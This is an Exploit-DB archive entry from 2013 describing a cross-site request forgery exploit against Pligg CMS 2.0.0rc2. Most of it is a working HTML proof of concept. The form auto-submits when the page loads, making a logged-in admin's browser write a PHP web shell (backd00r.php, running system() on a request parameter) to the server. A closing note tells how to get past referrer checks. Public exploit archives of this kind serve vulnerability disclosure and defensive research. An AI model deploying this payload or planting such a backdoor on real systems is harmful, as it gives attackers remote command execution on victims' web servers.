Pligg CMS 2.0.0rc2 - Cross-Site Request Forgery (File Creation)

Author: DaOne
type: webapps
platform: php
port: 
date_added: 2013-08-15  
date_updated: 2013-08-16  
verified: 1  
codes: OSVDB-96307  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt28000/screen-shot-2013-08-16-at-100441-am.png  
application_url: http://www.exploit-db.compligg-cms-2.0.0rc2.zip  

raw file: 27600.txt  
---------------------------------------------------
# Exploit Title: Pligg CMS - CSRF Vulnerability
# Author: DaOne
# Vendor Homepage: http://pligg.com/
# Download link: https://github.com/Pligg/pligg-cms/archive/2.0.0rc2.zip
# Category: webapps/php
# Version: 2.0.0rc2 + old versions
---------------------------------------------------

-Create File by CSRF Exploit-
<html>
<body onload="document.form.submit();">
<form action="http://[target]/pligg/admin/admin_editor.php" method="post" name="form">
<input type="hidden" name="updatedfile" value="<?php system($_REQUEST['cmd']); ?>">
<input type="hidden" name="the_file2" value="/var/www/html/pligg/backd00r.php">
<input type="hidden" name="isempty" value="1">
<input type="hidden" name="save" value="Save+Changes">
</form>
</body>
</html>

# Exploit-DB Note:
# If getting a Wrong Referrer error, use Live HTTP Headers or Tamper Date plugin
# to mitigate the issue.